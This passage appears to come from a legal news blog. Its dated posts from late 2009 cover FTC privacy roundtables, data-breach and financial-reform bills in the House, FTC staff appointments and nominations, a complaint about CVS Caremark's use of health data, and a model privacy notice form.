  • Should “sensitive” information be treated or handled differently than other consumer information?  How do we determine what information is “sensitive”?  What standards should apply to the collection and uses of such information?  Should information about children and teenagers be subject to different standards and, if so, what should they be? 

 

For those who cannot join the discussion in person, a live webcast of this conference will be available at the FTC's website

December 11, 2009

House Passes Financial Industry Reform Bill

On December 11, 2009, the House of Representatives passed a comprehensive financial industry reform bill, H.R. 4173, that would, among other measures, create a new financial oversight agency--the Consumer Financial Protection Agency (CFPA).  The legislation, passed by a vote of 223 to 202, consisted of multiple bills regarding financial industry practices, including portions of H.R. 3126, the Consumer Financial Protection Agency Act.  Under the new legislation, jurisdiction over consumer financial protection regulations, such as the Fair Credit Reporting Act and the Truth in Lending Act, would transfer from the Federal Trade Commission to the CFPA.  The Senate, which introduced similar financial reform draft legislation in November, is still debating how it will address financial industry reform.  More information regarding the financial reform legislation passed by the House can be found here.

December 10, 2009

H.R. 2221--The Data Accountability and Trust Act Passes in the House

On December 8, 2009, the United States House of Representatives passed H.R. 2221, the Data Accountability and Trust Act.  The bill has now been referred to the Senate Committee on Commerce, Science, and Transportation.
 
H.R. 2221 would require an entity, which owns or possess personal consumer information, to enact data protection security policies and to notify individuals if a security breach occurs.  The Federal Trade Commission would be required to promulgate rules regarding data breach notification and protection standards.  The bill would also preempt similar state laws.

December 4, 2009

FTC Holds Workshop on Journalism in the Internet Age

On December 1 and 2, the Federal Trade Commission held a workshop -- "How Will Journalism Survive the Internet Age?" -- exploring how the Internet has affected journalism and discussing a wide range of news-organization related issues, such as the economics of journalism in print and online, new business models for journalism online, and the ways in which journalism costs could be reduced while still maintaining quality. 
 
Commentators on this week's workshop have noted that what was not discussed -- notably behavioral advertising and other types of targeted online advertising -- is as important as issues that were discussed.  Future regulation of consumer privacy and behavioral advertising is still unsettled as legislators and regulators debate the scope of potential privacy legislation and new rules or models that will regulate the industry.
 
Further debate on this topic is likely to continue at the Federal Trade Commission's first Privacy Roundtable that will be held on Monday, December 7, at the Federal Trade Commission Conference Center in Washington, D.C.  A live webcast of this conference will be available at the FTC's website. 

November 30, 2009

FTC Senior Staff Appointments

The FTC has announced the appointments of several senior staff at the Commission:
  • Cecelia Prewett as the Director of the Office of Public Affairs.  Ms. Prewett has a background in communications both in the public and private sector, working for the American Association for Justice, AARP, the State of Illinois, and on Capitol Hill as a communications director to several Members of Congress
  • Jessica Rich as Deputy Director in the Bureau of Consumer Protection ("BCP").  Ms. Rich was most recently the Acting Associate Director of the Division of Privacy and Identity Protection in the BCP.  She was formerly an Assistant Director in the same division and the Division of Financial Practices, legal advisor to the Director of the BCP, and staff attorney in one of the FTC's consumer fraud divisions.
  • Charles Harwood as Deputy Director in the Bureau of Consumer Protection.  Mr. Harwood previously was the Director of the FTC's Northwest Regional Office in Seattle for 20 years.  Prior to joining the FTC, Mr. Harwood served as a counsel to the U.S. Senate's Committee on Commerce, Science, and Transportation, and the U.S. Department of the Interior's Indian Arts and Crafts Board.
  • Norm Armstrong, Jr. as Deputy Director in the Bureau of Competition.  Mr. Armstrong has served as Acting Deputy Direct in the Bureau of Competition, Deputy Assistant Director of the Mergers IV Division, Counsel to the Director, and Liaison to the Department of Defense.
  • Joel Winston as Associate Director of the Division of Financial Practices.  Mr. Winston has previously held several positions within the FTC including Associate Director of two divisions, Assistant Director of a division, and Assistant Deputy Director of the BCP.
  • Maneesha Mithal as Associate Director of the Division of Privacy and Identity Protection.  Ms. Mithal has previously served as Assistant Director of the same division and Assistant Deputy Director of the BCP.
  • Mark Eichorn as Assistant Director of the Division of Privacy and Identity Protection.  Mr. Eichorn has served as an Attorney Advisor to the Chairman and in the Division of Advertising Practices.

November 24, 2009

Consumer Advocates and Pharmacists' Group Request FTC and HHS Investigation of Possible Violation of Health Privacy Rules

The National Community Pharmacists Association (NCPA) and seven consumer advocacy groups have requested that the FTC and the Department of Health and Human Services to investigate activities by CVS Caremark that may violate HIPAA.  In a letter filed with the FTC and HHS, the organizations alleged that CVS Caremark used health information in violation of healthy privacy and antitrust laws.  CVS Caremark was created from the 2007 merger of the pharmacy CVS and the pharmacy benefits manager Caremark Corp.  The letter alleges, among other things, that CVS Caremark uses the information it obtains from non-CVS pharmacies through its pharmacy benefits management program to market the CVS mail-order pharmacy and CVS in-store pharmacy programs to those consumers--an inappropriate use of protected health information.
 
CVS Caremark recently settled an action with the FTC regarding its data security practices.
 
Additional coverage of the story is available here.

November 17, 2009

Federal Agencies Release Model Privacy Notice Form

Eight federal regulatory agencies announced the release of a final model privacy notice form.  The model privacy form is designed to help consumers understand how their information is collected and shared by financial institutions.  The model privacy form complies with the requirements for a financial institution to notify consumers of the institution's information sharing practices and provide consumers with an opportunity to opt out of certain practices pursuant to the Gramm-Leach-Bliley (GLB) Act.
 
The model privacy form uses plain language in a user-friendly format.  The agencies have developed a Model Privacy Form - Opt Out and a Model Privacy Form - No Opt Out.
 
The model privacy form was developed by:
  • Board of Governors of the Federal Reserve System;
  • Commodity Futures Trading Commission;
  • Federal Deposit Insurance Corporation;
  • Federal Trade Commission;
  • National Credit Union Administration;
  • Office of the Comptroller of the Currency;
  • Office of Thrift Supervision; and
  • Securities and Exchange Commission
A copy of the GLB Model Privacy Form Rule is available here.

FTC Announces Agenda for First Privacy Roundtable

The FTC has announced the agenda for the first of three privacy roundtables the Commission will host to discuss the privacy challenges posed by current technology and business practices that collect and use consumer data.

On December 7, 2009, at the FTC Conference Center in Washington, DC, panelists will discuss:
  • Benefits and risks of collecting, using, and retaining consumer data;
  • Consumer expectations and disclosures;
  • Online behavioral advertising;
  • Information brokers; and
  • Exploring existing regulatory frameworks
The roundtable will also be available via live webcast.

The FTC has also announced that the second roundtable will be held at the University of California, Berkeley, School of Law on January 28, 2010.

General information about the series of roundtables is available here.

Brill and Ramirez to be Nominated For FTC Commissioners

President Obama has selected Julie Brill and Edith Ramirez to serve on the Federal Trade Commission.  Brill is currently the Senior Deputy Attorney General and Chief of Consumer Protection and Antitrust for the North Carolina Department of Justice, a position she has held since February 2009.  Prior to working with the North Carolina DOJ, Brill was an Assistant Attorney General for the State of Vermont.  Ramirez is a currently a Partner with the law firm Quinn Emanuel Urquhart Oliver & Hedges, LLP in Los Angeles and focuses her practice on issues including copyright and trademark infringement, antitrust, and unfair competition.  Ramirez has represented companies including Mattel, American Broadcasting Companies, and The Walt Disney Company.
 
If confirmed by the Senate, Brill and Ramirez will fill the two vacant spots on the Commission created when Deborah Majoras left the FTC in March 2008 and Pamela Jones Harbor's term ended this September.  Brill and Ramirez would each serve a seven year term.
 
Additional information about Brill and Ramirez is available here.

November 12, 2009

CDT Submits Comments for FTC Consumer Privacy Roundtable

The Center for Democracy and Technology (CDT) has submitted comments for the Federal Trade Commission's (FTC) public roundtable discussions exploring the privacy challenges created by current and emerging technology, and business practices that involve the collection and use of consumer data.  The first in this series of FTC roundtable discussions will take place on December 7, 2009.  The CDT has urged the FTC to use these roundtable discussions to create a full set of fair information practice principles (FIPs) for a stronger privacy protection framework.  The CDT also made specific recommendations to improve privacy protection in the 21st century.
  • The FTC should pursue enforcement actions against all businesses involved in unfair privacy practices, not just spyware companies.
  • The FTC should use its subpoena power to acquire information about company privacy practices.    
  • The Commission should encourage Congress to pass general consumer privacy legislation that would allow the FTC to draft its own set of consumer privacy rules to clarify basic privacy expectations and strengthen privacy protection. 
  • The FTC should establish benchmarks and metrics for evaluating company privacy policies, and the Commission should more actively promote the development of privacy-enhancing technology. 
The CDT's full comments can be found here